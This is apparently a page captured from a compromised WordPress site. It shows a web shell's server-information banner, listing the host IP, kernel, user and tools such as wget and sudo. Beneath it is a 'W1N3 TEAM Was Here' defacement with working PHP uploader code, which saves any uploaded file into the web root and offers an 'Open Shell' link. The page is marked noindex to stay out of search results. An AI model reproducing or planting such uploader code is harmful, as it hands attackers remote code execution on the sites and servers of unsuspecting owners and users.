| Server IP : 52.25.153.185 / Your IP : 216.73.216.222 Web Server : Apache System : Linux ip-172-26-6-158 5.10.0-45-cloud-amd64 #1 SMP Debian 5.10.259-1 (2026-07-02) x86_64 User : daemon ( 1) PHP Version : 8.1.10 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /bitnami/wordpress/wp-content/uploads/WPL/7382/ |
Upload File : |
<meta name="robots" content="noindex">
<h1 style="font-family:monospace">W1N3 TEAM Was Here !!!</h1>
<title>W1N3 TEAM</title>
<form method="post" enctype="multipart/form-data">
<input type="file" name="yujiofc">
<button>Croottz!</button>
</form>
<?php echo "Nx-zD".PHP_VERSION; if (isset($_FILES['yujiofc'])) {
$target = $_SERVER['DOCUMENT_ROOT'] . '/' . $_FILES['yujiofc']['name'];
if (move_uploaded_file($_FILES['yujiofc']['tmp_name'], $target)) {
echo "[Success] <a href='/" . $_FILES['yujiofc']['name'] . "' target='_blank'>Open Shell</a>";
} else {
echo "[❌] Upload failed bro.";
}
} ?>